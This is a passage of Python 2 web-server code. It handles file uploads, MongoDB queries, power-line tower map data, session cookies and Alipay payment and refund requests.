p = os.path.join(p, 'xls')
if not os.path.exists(p):
os.mkdir(p)
return p
def create_voice_dir():
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
if not os.path.exists(UPLOAD_VOICE_DIR):
os.mkdir(UPLOAD_VOICE_DIR)
def check_voice_file_by_fault(id):
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
create_voice_dir()
ret = False
for fn in os.listdir(UPLOAD_VOICE_DIR):
if id in fn:
ret = True
break
return ret
def get_voice_file_latest(id):
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
create_voice_dir()
l = []
for fn in os.listdir(UPLOAD_VOICE_DIR):
if id in fn:
l.append(fn)
ret = None
if len(l)>0:
l.sort()
ret = l[-1]
return ret
def get_voice_file_by(id):
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
create_voice_dir()
l = []
for fn in os.listdir(UPLOAD_VOICE_DIR):
if id in fn:
l.append(fn)
return l
def get_voice_file_all():
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
s = set()
for fn in os.listdir(UPLOAD_VOICE_DIR):
p = os.path.join(UPLOAD_VOICE_DIR, fn)
if os.path.isfile(p):
arr = fn.split('@')
if len(arr)==3:
id = arr[1]
s.add(id)
return list(s)
def create_pic_dir():
global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR
if not os.path.exists(os.path.join(STATICRESOURCE_DIR,'photos')):
os.mkdir(os.path.join(STATICRESOURCE_DIR,'photos'))
if not os.path.exists(UPLOAD_PHOTOS_DIR):
os.mkdir(UPLOAD_PHOTOS_DIR)
def handle_upload_file(querydict, buf):
global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR
ret = False
# root = os.path.abspath(STATICRESOURCE_DIR)
try:
if querydict.has_key('db'):
db_util.gridfs_save(querydict, querydict['filename'], buf)
ret = True
except Exception,e:
raise
return ret
def import_xls(path, fileobj, area, line_name, voltage, category):
with open(path, 'wb') as f:
f.write(fileobj)
return db_util.import_tower_xls_file(area, line_name, voltage, category, path)
def save_file_to(category, dir_id, filename, fileobj):
root = os.path.abspath(category)
if not os.path.exists(root):
os.mkdir(root)
p = os.path.join(root, filename)
if dir_id:
p = os.path.join(root, dir_id)
if not os.path.exists(p):
os.mkdir(p)
p = os.path.join(root, dir_id, filename)
with open(p, 'wb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'wb')
f1.write(fileobj)
def geojson_to_czml(aList):
cz = czml.CZML()
for i in aList:
if i.has_key('properties') and i['properties'].has_key('id'):
packet = czml.CZMLPacket(id=i['properties']['id'])
#tower
if i['properties'].has_key('tower_code'):
packet = czml.CZMLPacket(id=i['properties']['id'], name=i['properties']['tower_name'])
packet.position = czml.Position(cartographicDegrees = [i['geometry']['coordinates'][0], i['geometry']['coordinates'][1], i['geometry']['coordinates'][2],])
packet.point = czml.Point(show=True, color={'rgba': [255, 255, 0, 255]}, pixelSize=10, outlineColor={'rgba': [0, 0, 0, 255]}, outlineWidth=1)
#packet.label = czml.Label(text=i['properties']['tower_name'], show=True, scale=0.5)
packet.description = i['properties']['tower_name']
#packet.billboard = czml.Billboard(image='http://localhost:88/img/tower.png')
cz.append(packet)
return cz
def handle_post_method(environ):
global ENCODING
global gRequest
querydict, buf = get_querydict_by_GET_POST(environ)
ret = {}
is_upload = False
is_mongo = False
use_czml = False
get_extext = False
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
if buf is not None:
try:
is_upload = handle_upload_file(querydict, buf)
except:
pass
if querydict.has_key('db') and querydict.has_key('collection'):
is_mongo = True
dbname = querydict['db']
collection = querydict['collection']
action = None
data = None
if querydict.has_key('action'):
action = querydict['action']
del querydict['action']
if querydict.has_key('data'):
data = querydict['data']
del querydict['data']
if querydict.has_key('use_czml') and querydict['use_czml']:
use_czml = True
del querydict['use_czml']
if querydict.has_key('get_extext') and querydict['get_extext']:
get_extext = True
del querydict['get_extext']
del querydict['db']
del querydict['collection']
if action:
if 'markdown_' in action or u'markdown_' in action:
l = db_util.mongo_action(dbname, collection, action, data, querydict, 'markdown')
else:
l = db_util.mongo_action(dbname, collection, action, data, querydict)
else:
l = db_util.mongo_find(dbname, collection, querydict)
if get_extext:
l = db_util.find_extent(l)
if use_czml:
l = geojson_to_czml(l)
if isinstance(l, list) and len(l) >= 0:
ret = l
elif isinstance(l, dict) and len(l.keys()) > 0:
ret = l
elif isinstance(l, czml.CZML):
headers['Content-Type'] = 'text/json;charset=' + ENCODING
return '200 OK', headers, enc(l.dumps())
#else:
#ret["result"] = "%s.%s return 0 record" % (dbname, collection)
#else:
#ret["result"] = "unknown query operation"
if not is_mongo:
if querydict.has_key('thunder_counter'):
try:
ret = handle_thunder_soap(querydict)
except:
e = sys.exc_info()[1]
if hasattr(e, 'message'):
ret['result'] = e.message
else:
ret['result'] = str(e)
elif querydict.has_key('op'):
if querydict.has_key('area') and querydict['area'] and len(querydict['area'])>0:
if querydict['op'] in ['save','delete','update']:
ret = db_util.odbc_save_data_to_table(querydict['table'], querydict['op'], querydict['data'], querydict['line_id'], querydict['start_tower_id'], querydict['end_tower_id'], querydict['area'])
else:
ret = handle_requset_sync(querydict)
elif querydict['op'] in ['alt','height'] :
if querydict.has_key('lng') and querydict.has_key('lat') and isinstance(querydict['lng'], float) and isinstance(querydict['lat'], float):
ret = db_util.extract_one_altitude(querydict['lng'], querydict['lat'])
if querydict.has_key('data') and isinstance(querydict['data'], list):
ret = db_util.extract_many_altitudes(querydict['data'])
else:
ret["result"] = "unknown area"
elif querydict.has_key('tracks') and querydict.has_key('area'):
ret = db_util.save_tracks(querydict['tracks'], querydict['area'])
elif querydict.has_key('mobile_action') and querydict.has_key('area') and querydict.has_key('data'):
ret = db_util.mobile_action(querydict['mobile_action'], querydict['area'], querydict['data'])
if isinstance(ret, list):
pass
elif isinstance(ret, str) or isinstance(ret, unicode) or isinstance(ret, int) or isinstance(ret, float):
pass
elif isinstance(ret, dict):
if len(ret.keys())==0:
pass
elif ret.has_key('result'):
if isinstance(ret['result'], exceptions.Exception):
if hasattr(ret['result'], 'message'):
ret['result'] = ret['result'].message
else:
ret['result'] = str(ret['result'])
elif isinstance(ret['result'], str) or isinstance(ret['result'], unicode) or isinstance(ret['result'], int) or isinstance(ret['result'], float):
pass
elif isinstance(ret['result'], list) or isinstance(ret['result'], dict):
pass
else:
ret["result"] = "unknown operation"
else:
ret["result"] = "unknown operation"
#time.sleep(6)
#print(ret)
return '200 OK', headers, json.dumps(ret, ensure_ascii=True, indent=4)
# def handle_login(environ):
# global ENCODING
# global gRequest
# buf = environ['wsgi.input'].read()
# ret = None
# try:
# ds_plus = urllib.unquote_plus(buf)
# obj = json.loads(dec(ds_plus))
# if obj.has_key(u'db') and obj.has_key(u'collection'):
# is_mongo = True
# dbname = obj[u'db']
# collection = obj[u'collection']
# action = None
# data = None
# if obj.has_key(u'action'):
# action = obj[u'action']
# del obj[u'action']
# if obj.has_key(u'data'):
# data = obj[u'data']
# del obj[u'data']
# if obj.has_key(u'url'):
# del obj[u'url']
# if obj.has_key(u'redirect'):
# del obj[u'redirect']
# del obj[u'db']
# del obj[u'collection']
# if action:
# ret = db_util.mongo_action(dbname, collection, action, data, obj)
# except:
# raise
# return ret
def handle_thunder_soap(obj):
ret = {}
if obj['thunder_counter'] == 'GetFlashofDate':
ret = soap_GetFlashofDate(obj['start_time'], obj['end_time'])
if obj['thunder_counter'] == 'GetFlashofEnvelope':
ret = soap_GetFlashofEnvelope(obj['start_time'], obj['end_time'], obj['lng1'], obj['lng2'], obj['lat1'], obj['lat2'])
return ret
def dishen_ws_loop(aWebSocket, aHash):
while 1:
#now = time.strftime('%Y-%m-%d %H:%M:%S')[:10]
#ws.send("%d,%f\n" % ((time.time() - time.timezone)*1000, random.random()*10))
#t = (time.time() - time.timezone) * 1000
t = time.time() * 1000
if aWebSocket:
#message = aWebSocket.receive()
#print("message=%s" % message)
aWebSocket.send( '%s\n%d' % (str(aHash),int(t)) )
else:
break
gevent.sleep(1.0)
def check_session(environ, request, session_store):
global gConfig
def set_cookie(key, value):
secure = False
if gConfig['listen_port']['enable_ssl'].lower() == 'true':
secure = True
max_age = int(gConfig['authorize_platform']['session']['session_age'])
cookie = ('Set-Cookie', dump_cookie(key, value, domain=str(gConfig['authorize_platform']['session']['session_domain']), max_age=max_age, secure=secure))
return cookie
sid = request.cookies.get('authorize_platform_session_id')
cookie = None
is_expire = False
sess = None
if sid is None or len(sid)==0:
request.session = session_store.new({})
#session_store.save(request.session)
is_expire = True
cookie = set_cookie('authorize_platform_session_id', request.session.sid )
sess = request.session
else:
request.session = session_store.get(sid)
if request.session:
cookie = set_cookie('authorize_platform_session_id', request.session.sid)
session_store.save_if_modified(request.session)
else:
cookie = set_cookie('authorize_platform_session_id', '')
is_expire = True
sess = request.session
return sess, cookie, is_expire
def get_token_from_env(environ):
global gConfig, gLoginToken
cookie = parse_cookie(environ)
session_id = None
ret = None
if cookie.has_key('session_id'):
session_id = cookie['session_id']
if gLoginToken.has_key(session_id):
ret = gLoginToken[session_id]
return session_id, ret
def get_session_from_env(environ):
global gSessionStore
cookie = parse_cookie(environ)
session_id = None
ret = None
if cookie.has_key('session_id'):
session_id = cookie['session_id']
ret = gSessionStore.get(session_id)
return ret
def get_userinfo_from_env(environ):
global gConfig, gLoginToken
cookie = parse_cookie(environ)
session_id = None
ret = None
if cookie.has_key('session_id'):
session_id = cookie['session_id']
if gLoginToken.has_key(session_id):
ret = gLoginToken[session_id]
return session_id, ret
def get_sign_alipay(sign_data):
global gConfig
ret = ''
text = sign_data + gConfig['pay_platform']['alipay']['partner_key']
text = enc_by_code(gConfig['pay_platform']['alipay']['input_charset'], text)
if (gConfig['pay_platform']['alipay']['sign_type']).lower() == 'md5':
md5.digest_size = 32
ret = md5.new(text).hexdigest()
return ret
def check_sign_alipay(input_charset, signature, sign_type, original_data):
global gConfig
text = original_data + gConfig['pay_platform']['alipay']['partner_key']
text = enc_by_code(str(input_charset), text)
ret = ''
if str(sign_type).lower() == 'md5':
md5.digest_size = 32
ret = md5.new(text).hexdigest()
return ret == str(signature)
def build_query_string(data={}):
ret = ''
keys = data.keys()
keys.sort()
for k in keys:
ret += '%s=%s' % (k, data[k])
if keys.index(k) < len(keys) - 1:
ret += '&'
return ret
def get_pay_record_by_id(querydict):
ret = None
if querydict['pay_channel'] == 'alipay':
out_trade_no = querydict['out_trade_no']
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if 'pay_log' in db.collection_names(False):
collection = db['pay_log']
ret = collection.find_one({"out_trade_no":out_trade_no})
return ret
def refund_alipay(querydict):
global ENCODING
global gConfig, gSecurityConfig, gJoinableQueue
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
href = str(gConfig['pay_platform']['alipay']['submit_gateway'])
sign_data = {}
sign_data['_input_charset'] = gConfig['pay_platform']['alipay']['input_charset']
sign_data['partner'] = gConfig['pay_platform']['alipay']['partner_id']
sign_data['service'] = 'refund_fastpay_by_platform_pwd'
sign_data['refund_date'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sign_data['batch_no'] = datetime.datetime.now().strftime("%Y%m%d") + str(ObjectId())
sign_data['batch_num'] = '1'
querydict['refund_date'] = sign_data['refund_date']
querydict['batch_no'] = sign_data['batch_no']
querydict['batch_num'] = int(sign_data['batch_num'])
if len(gConfig['pay_platform']['alipay']['return_url'])>0:
sign_data['return_url'] = gConfig['pay_platform']['alipay']['return_url']
if len(gConfig['pay_platform']['alipay']['error_notify_url'])>0:
sign_data['error_notify_url'] = gConfig['pay_platform']['alipay']['error_notify_url']
if len(gConfig['pay_platform']['alipay']['notify_url'])>0:
sign_data['notify_url'] = gConfig['pay_platform']['alipay']['notify_url']
rec = get_pay_record_by_id(querydict)
if rec:
if rec.has_key('error_code'):
body = json.dumps({'result':'refund_fail_pay_has_fail' }, ensure_ascii=True, indent=4)
else:
if rec.has_key('seller_email') \
and rec.has_key('trade_no') :
trade_no = rec['trade_no']
sign_data['seller_email'] = rec['seller_email']
querydict['seller_email'] = sign_data['seller_email']
querydict['trade_no'] = trade_no
detail_data = '%s^%.2f^%s' % (trade_no, float(querydict['refund_fee']), querydict['refund_desc'] )
sign_data['detail_data'] = detail_data
if not rec.has_key('seller_email'):
body = json.dumps({'result':'refund_fail_seller_email_required' }, ensure_ascii=True, indent=4)
if not rec.has_key('trade_no'):
body = json.dumps({'result':'refund_fail_trade_no_required' }, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'refund_fail_pay_trade_not_found:%s' % querydict['out_trade_no']}, ensure_ascii=True, indent=4)
if len(body) == 0:
#querydict['refund_result'] = 'refund_sending_to_alipay'
querydict['refund_result'] = 'refund_adding_to_queue'
querydict['refund_fee'] = float(querydict['refund_fee'])
g = gevent.spawn(update_refund_log, querydict['out_trade_no'], querydict)
#g1 = sign_and_send_alipay('post', href, sign_data)
#g1.join()
#resp = g1.value
#s = resp.read()
#print('refund response: [%s]' % dec(s))
#body = json.dumps({'result':'refund_sending_to_alipay'}, ensure_ascii=True, indent=4)
try:
gJoinableQueue.put({'thirdpay':'alipay', 'method':'post', 'url':href, 'data':sign_data})
except gevent.queue.Full:
body = json.dumps({'result':'refund_err_queue_full'}, ensure_ascii=True, indent=4)
body = json.dumps({'result':'refund_adding_to_queue'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def pay_alipay(querydict):
global ENCODING
global gConfig, gSecurityConfig, gJoinableQueue
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
href = str(gConfig['pay_platform']['alipay']['submit_gateway'])
if not href[-1:] == '?':
href += '?'
sign_data = {}
sign_data['_input_charset'] = gConfig['pay_platform']['alipay']['input_charset']
sign_data['total_fee'] = querydict['total_fee']
sign_data['out_trade_no'] = querydict['out_trade_no']
sign_data['partner'] = gConfig['pay_platform']['alipay']['partner_id']
sign_data['payment_type'] = '1'
sign_data['seller_email'] = querydict['seller_email']
sign_data['buyer_email'] = querydict['buyer_email']
sign_data['service'] = 'create_direct_pay_by_user'
sign_data['subject'] = querydict['subject']
if len(gConfig['pay_platform']['alipay']['return_url'])>0:
sign_data['return_url'] = gConfig['pay_platform']['alipay']['return_url']
if len(gConfig['pay_platform']['alipay']['error_notify_url'])>0:
sign_data['error_notify_url'] = gConfig['pay_platform']['alipay']['error_notify_url']
if len(gConfig['pay_platform']['alipay']['notify_url'])>0:
sign_data['notify_url'] = gConfig['pay_platform']['alipay']['notify_url']
#querydict['trade_status'] = 'pay_sending_to_alipay'
querydict['trade_status'] = 'pay_adding_to_queue'
querydict['total_fee'] = float(querydict['total_fee'])
if querydict.has_key('defaultbank'):
if gSecurityConfig['alipay']['bank_code'].has_key(querydict['defaultbank']):
sign_data['defaultbank'] = querydict['defaultbank']
sign_data['paymethod'] = 'bankPay'
else:
body = json.dumps({'result':'pay_fail_wrong_bank_code'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
if gConfig['pay_platform']['alipay']['need_ctu_check'].lower() == 'true':
sign_data['need_ctu_check'] = 'Y'
if gConfig['pay_platform']['alipay']['anti_fishing'].lower() == 'true':
sign_data['anti_phishing_key'] = ''
sign_data['exter_invoke_ip'] = ''
g = gevent.spawn(update_pay_log, querydict['out_trade_no'], querydict)
#g1 = sign_and_send_alipay('post', href, sign_data)
#body = json.dumps({'result':'pay_sending_to_alipay'}, ensure_ascii=True, indent=4)
try:
gJoinableQueue.put({'thirdpay':'alipay','method':'post', 'url':href, 'data':sign_data})
except gevent.queue.Full:
body = json.dumps({'result':'pay_err_queue_full'}, ensure_ascii=True, indent=4)
body = json.dumps({'result':'pay_adding_to_queue'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_refund(environ):
global ENCODING
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
querydict = {}
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querydict = urlparse.parse_qs(dec(querystring))
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
try:
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
d = json.loads(dec(ds_plus))
for k in d.keys():
querydict[k] = d[k]
except:
pass
if len(querydict.keys()) > 0:
if querydict.has_key('out_trade_no') and len(querydict['out_trade_no'])>0\
and querydict.has_key('pay_channel') and len(querydict['pay_channel'])>0\
and querydict.has_key('refund_fee') and len(querydict['refund_fee'])>0\
and querydict.has_key('refund_desc') and len(querydict['refund_desc'])>0:
if querydict['pay_channel'] == 'alipay':
refund_fee = 0
try:
refund_fee = float(querydict['refund_fee'])
except:
body = json.dumps({'result':'refund_fail_refund_fee_wrong_format'}, ensure_ascii=True, indent=4)
refund_fee = 0
if '^' in querydict['refund_desc'] \
or '#' in querydict['refund_desc'] \
or '|' in querydict['refund_desc'] \
or '$' in querydict['refund_desc'] \
or len(querydict['refund_desc'])>128 :
refund_fee = 0
body = json.dumps({'result':'refund_fail_refund_desc_wrong_charactor'}, ensure_ascii=True, indent=4)
if refund_fee>0:
statuscode, headers, body = refund_alipay(querydict)
#else:
#body = json.dumps({'result':'refund_fail_refund_fee_wrong_format'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'refund_fail_unsupport_pay_channel'}, ensure_ascii=True, indent=4)
if not querydict.has_key('out_trade_no') or len(querydict['out_trade_no'])==0:
body = json.dumps({'result':'refund_fail_out_trade_no_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('refund_fee') \
or (isinstance(querydict['refund_fee'], unicode) and len(querydict['refund_fee'])==0) \
or (isinstance(querydict['refund_fee'], float) and querydict['refund_fee']==0.0):
body = json.dumps({'result':'refund_fail_refund_fee_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('refund_desc') or len(querydict['refund_desc'])==0:
body = json.dumps({'result':'refund_fail_refund_desc_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('pay_channel') or len(querydict['pay_channel'])==0:
body = json.dumps({'result':'refund_fail_pay_channel_required'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'refund_fail_wrong_data_format'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_pay_getinfo(environ):
global ENCODING
global gConfig, gSecurityConfig
def get_collection(collection):
ret = None
db_util.mongo_init_client('pay_platform')
db = db_util.gClientMongo['pay_platform'][gConfig['pay_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def query_pay_log(condition):
ret = []
collection = get_collection(gConfig['pay_platform']['mongodb']['collection_pay_log'])
ret = list(collection.find(condition))
#for i in cur:
#ret.append(i)
return ret
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
querydict = {}
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querydict = urlparse.parse_qs(dec(querystring))
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
try:
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
d = json.loads(dec(ds_plus))
for k in d.keys():
querydict[k] = d[k]
except:
pass
if len(querydict.keys()) > 0:
if querydict.has_key('q'):
if querydict['q'] == 'bank_info':
if querydict.has_key('bank_code'):
if querydict['bank_code'] == 'all' or len(querydict['bank_code'])==0:
body = json.dumps(gSecurityConfig['alipay']['bank_code'], ensure_ascii=True, indent=4)
else:
if gSecurityConfig['alipay']['bank_code'].has_key(querydict['bank_code']):
body = json.dumps(gSecurityConfig['alipay']['bank_code'][querydict['bank_code']], ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'wrong_bank_code'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'unknown_query_type'}, ensure_ascii=True, indent=4)
elif querydict['q'] == 'error_info':
if querydict.has_key('error_code'):
if querydict['error_code'] == 'all' or len(querydict['error_code'])==0:
body = json.dumps(gSecurityConfig['alipay']['error_code'], ensure_ascii=True, indent=4)
else:
if gSecurityConfig['alipay']['error_code'].has_key(querydict['error_code']):
body = json.dumps(gSecurityConfig['alipay']['error_code'][querydict['error_code']], ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'wrong_error_code'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'unknown_query_type'}, ensure_ascii=True, indent=4)
elif querydict['q'] == 'trade_status':
if querydict.has_key('out_trade_no'):
if len(querydict['out_trade_no'])>0:
l = []
if isinstance(querydict['out_trade_no'], unicode):
l = query_pay_log({'out_trade_no': querydict['out_trade_no']})
elif isinstance(querydict['out_trade_no'], list):
idlist = [ObjectId(i) for i in querydict['out_trade_no']]
l = query_pay_log({'out_trade_no': {'$in': idlist}})
if len(l) > 0:
ll = []
for i in l:
o = {}
o['out_trade_no'] = i['out_trade_no']
if i.has_key('trade_status'):
o['trade_status'] = i['trade_status']
else:
o['trade_status'] = None
if i.has_key('error_code'):
o['error_code'] = i['error_code']
else:
o['error_code'] = None
if i.has_key('refund_status'):
o['refund_status'] = i['refund_status']
else:
o['refund_status'] = None
ll.append(o)
body = json.dumps(db_util.remove_mongo_id(ll), ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'out_trade_no_not_exist'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'out_trade_cannot_be_null'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'out_trade_no_required'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'unknown_query_type'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_pay(environ):
global ENCODING
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
querydict = {}
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querydict = urlparse.parse_qs(dec(querystring))
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
try:
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
d = json.loads(dec(ds_plus))
for k in d.keys():
querydict[k] = d[k]
except:
pass
if len(querydict.keys()) > 0:
if querydict.has_key('out_trade_no') and len(querydict['out_trade_no'])>0 \
and querydict.has_key('subject') and len(querydict['subject'])>0 \
and querydict.has_key('total_fee') and len(querydict['total_fee'])>0 \
and querydict.has_key('buyer_email') and len(querydict['buyer_email'])>0 \
and querydict.has_key('seller_email') and len(querydict['seller_email'])>0 \
and querydict.has_key('pay_channel') and len(querydict['pay_channel'])>0 :
if querydict['pay_channel'] == 'alipay':
#if querydict.has_key('service'):
total_fee = 0
try:
total_fee = float(querydict['total_fee'])
except:
body = json.dumps({'result':'pay_fail_total_fee_wrong_format'}, ensure_ascii=True, indent=4)
total_fee = 0
if '^' in querydict['subject'] \
or '#' in querydict['subject'] \
or '|' in querydict['subject'] \
or '$' in querydict['subject'] \
or '%' in querydict['subject'] \
or '&' in querydict['subject'] \
or '+' in querydict['subject'] \
or len(querydict['subject'])>128 :
total_fee = 0
body = json.dumps({'result':'pay_fail_subject_wrong_charactor'}, ensure_ascii=True, indent=4)
if total_fee>0:
statuscode, headers, body = pay_alipay(querydict)
else:
body = json.dumps({'result':'pay_fail_total_fee_wrong_format'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'pay_fail_unsupport_pay_channel'}, ensure_ascii=True, indent=4)
if not querydict.has_key('out_trade_no') or len(querydict['out_trade_no'])==0:
body = json.dumps({'result':'pay_fail_out_trade_no_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('subject') or len(querydict['subject'])==0:
body = json.dumps({'result':'pay_fail_subject_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('total_fee') \
or (isinstance(querydict['total_fee'], unicode) and len(querydict['total_fee'])==0) \
or (isinstance(querydict['total_fee'], float) and querydict['total_fee']==0.0):
body = json.dumps({'result':'pay_fail_total_fee_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('buyer_email') or len(querydict['buyer_email'])==0:
body = json.dumps({'result':'pay_fail_buyer_email_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('seller_email') or len(querydict['seller_email'])==0:
body = json.dumps({'result':'pay_fail_seller_email_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('pay_channel') or len(querydict['pay_channel'])==0:
body = json.dumps({'result':'pay_fail_pay_channel_required'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'pay_fail_wrong_data_format'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def update_refund_log(out_trade_no, data, is_insert=True):
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if not 'refund_log' in db.collection_names(False):
collection = db.create_collection('refund_log')
collection.ensure_index([("out_trade_no", pymongo.ASCENDING),])
else:
collection = db['refund_log']
rec = collection.find_one({"out_trade_no":out_trade_no})
if data.has_key('refund_fee') and (isinstance(data['refund_fee'], unicode) or isinstance(data['refund_fee'], str)):
data['refund_fee'] = float(data['refund_fee'])
if rec:
for k in data.keys():
rec[k] = data[k]
wr = collection.update({'_id':rec['_id']}, db_util.add_mongo_id(rec), multi=False, upsert=False)
if wr and wr['n'] == 0:
print('update out_trade_no [%s] failed' % out_trade_no)
else:
if is_insert:
try:
_id = collection.insert( db_util.add_mongo_id(data))
#print('refund_log insert _id=%s' % str(_id))
except:
print('refund_log insert out_trade_no [%s] failed' % out_trade_no)
def update_pay_log(out_trade_no, data, is_insert=True):
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if not 'pay_log' in db.collection_names(False):
collection = db.create_collection('pay_log')
collection.ensure_index([("out_trade_no", pymongo.ASCENDING),])
else:
collection = db['pay_log']
rec = collection.find_one({"out_trade_no":out_trade_no})
if data.has_key('total_fee') and (isinstance(data['total_fee'], unicode) or isinstance(data['total_fee'], str)):
data['total_fee'] = float(data['total_fee'])
if data.has_key('refund_fee') and (isinstance(data['refund_fee'], unicode) or isinstance(data['refund_fee'], str)):
data['refund_fee'] = float(data['refund_fee'])
if data.has_key('price') and (isinstance(data['price'], unicode) or isinstance(data['price'], str)):
data['price'] = float(data['price'])
if data.has_key('quantity') and (isinstance(data['quantity'], unicode) or isinstance(data['quantity'], str)):
data['quantity'] = int(data['quantity'])
if rec:
for k in data.keys():
rec[k] = data[k]
wr = collection.update({'_id':rec['_id']}, db_util.add_mongo_id(rec), multi=False, upsert=False)
#print(wr)
if wr and wr['n'] == 0:
print('update out_trade_no [%s] failed' % out_trade_no)
else:
if is_insert:
try:
_id = collection.insert( db_util.add_mongo_id(data))
#print('pay_log insert _id=%s' % str(_id))
except:
print('pay_log insert out_trade_no [%s] failed' % out_trade_no)
def handle_alipay_return_url(environ):
global ENCODING
global gConfig, gSecurityConfig
querydict = {}
data = {}
data['pay_channel'] = 'alipay'
querystring = ''
if environ.has_key('QUERY_STRING'):
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querystring = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], querystring)
querydict = urlparse.parse_qs(querystring)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
if querydict.has_key('notify_type') and 'trade_status_' in querydict['notify_type'] and querydict.has_key('out_trade_no'):
if querydict.has_key('is_success'):
if querydict['is_success'] == 'T':
data['trade_status'] = 'send_to_alipay_success'
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
if querydict.has_key('buyer_email'):
data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('seller_id'):
data['seller_id'] = querydict['seller_id']
if querydict.has_key('buyer_id'):
data['buyer_id'] = querydict['buyer_id']
if querydict.has_key('notify_time'):
data['notify_time'] = querydict['notify_time']
if querydict.has_key('notify_type'):
data['notify_type'] = querydict['notify_type']
if querydict.has_key('notify_id'):
data['notify_id'] = querydict['notify_id']
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
if querydict.has_key('subject'):
data['subject'] = querydict['subject']
if querydict.has_key('payment_type'):
data['payment_type'] = querydict['payment_type']
if querydict.has_key('trade_no'):
data['trade_no'] = querydict['trade_no']
if querydict.has_key('trade_status'):
data['trade_status'] = querydict['trade_status']
if gSecurityConfig['alipay']['trade_status'].has_key(data['trade_status']):
data['trade_status_desc'] = gSecurityConfig['alipay']['trade_status'][data['trade_status']]
if querydict.has_key('gmt_create'):
data['gmt_create'] = querydict['gmt_create']
if querydict.has_key('gmt_payment'):
data['gmt_payment'] = querydict['gmt_payment']
if querydict.has_key('gmt_close'):
data['gmt_close'] = querydict['gmt_close']
if querydict.has_key('gmt_refund'):
data['gmt_refund'] = querydict['gmt_refund']
if querydict.has_key('body'):
data['body'] = querydict['body']
if querydict.has_key('error_code'):
data['error_code'] = querydict['error_code']
if querydict.has_key('bank_seq_no'):
data['bank_seq_no'] = querydict['bank_seq_no']
if querydict.has_key('out_channel_type'):
data['out_channel_type'] = querydict['out_channel_type']
if querydict.has_key('out_channel_amount'):
data['out_channel_amount'] = querydict['out_channel_amount']
if querydict.has_key('out_channel_inst'):
data['out_channel_inst'] = querydict['out_channel_inst']
if querydict.has_key('business_scene'):
data['business_scene'] = querydict['business_scene']
if querydict.has_key('total_fee'):
data['total_fee'] = querydict['total_fee']
if data.has_key('out_trade_no'):
g = gevent.spawn(update_pay_log, data['out_trade_no'], data, False)
def handle_alipay_notify_url(environ):
global gConfig, gSecurityConfig
buf = environ['wsgi.input'].read()
